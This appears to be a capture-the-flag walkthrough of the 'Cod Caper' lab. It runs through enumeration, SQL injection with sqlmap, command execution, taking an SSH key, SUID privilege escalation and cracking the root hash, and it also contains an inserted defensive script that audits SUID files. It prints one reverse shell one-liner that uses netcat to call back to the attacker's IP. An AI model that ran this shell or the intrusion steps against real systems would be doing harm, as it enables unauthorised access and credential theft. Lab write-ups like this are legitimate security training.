The Cod Caper

Last updated 3 years ago

Host Enumeration

Let's run an nmap scan to find the open ports and the services running on them.

Web Enumeration

Let's check the webpage.

It's a default Apache2 page, so let's run gobuster to find hidden files and directories.

Web Exploitation

Let's use sqlmap to find more information.

Command Execution

Let's check the administrator.php page and log in with the credentials we found.

Looks like we can run commands. Let's get a reverse shell on the machine. First we start a netcat listener.

Now let's run the reverse shell command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 1234 >/tmp/f

We have a shell. Let's stabilize the shell.

Let's look at how many files are in the current directory.

Let's check if pingu still has his account on this machine.

Looks like he does.

Let's look for interesting files belonging to www-data.

Let's look at this interesting file.

Looks like a password.

Let's now go get the private SSH key of pingu.

Let's cat the contents of id_rsa, copy it to our machine and save it as a file called id_rsa.

Now let's set the permissions for the file and log in with the password we found.

LinEnum

Let's use the second method. First, on our machine, let's cd into the directory where the LinEnum file is located and start an HTTP server on port 8000.

Now let's go to the /tmp folder on the victim machine and download the file.

Now let's give it executable permissions and run the file.

Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common.
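The defender's side of the SUID finding above, as an added example that is not part of the original writeup: a POSIX shell audit that lists setuid files, reports any that are missing from a reviewed baseline, and separately flags setuid files that group or others can write to. The function names and the baseline file format (one absolute path per line) are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit setuid files against a reviewed baseline.
# Function names and the baseline format are assumptions, not from the writeup.

# List regular files with the setuid bit under $1, staying on one filesystem.
list_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# Print setuid files under $1 that are not listed in baseline file $2
# (one absolute path per line; comment and blank lines never match a path,
# so they are harmless). Returns 1 when something unexpected is found.
unexpected_suid() {
    _found=$(list_suid "$1" | grep -vxFf "$2")
    if [ -z "$_found" ]; then
        return 0
    fi
    printf '%s\n' "$_found"
    return 1
}

# Print setuid files under $1 that group or others can modify. Anyone with
# write access can replace the contents and have them run as the file owner.
writable_suid() {
    find "$1" -xdev -type f -perm -4000 \
        \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null | sort
}

# Stand-alone use: ./suid-audit.sh <scan-root> <baseline-file>
if [ "$#" -ge 2 ]; then
    echo "== setuid files not in baseline =="
    unexpected_suid "$1" "$2" | while IFS= read -r f; do ls -ld "$f"; done
    echo "== setuid files writable by group/other =="
    writable_suid "$1"
fi
```

Build the baseline from a freshly installed host of the same image, review it once, and run the audit on a schedule so that a new setuid binary in an unusual location shows up as a diff.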

pwndbg

Binary-Exploitation: Manually

Binary-Exploitation: The Pwntools way

Binary Exploitation

Let's use the manual way.

Let's cd into the /opt/secret directory and run the command to get the hash of the root user.

Finishing The Job

We have the hash. Let's copy it, save it on our machine in a file called hash, and crack it using hashcat.

We have the password.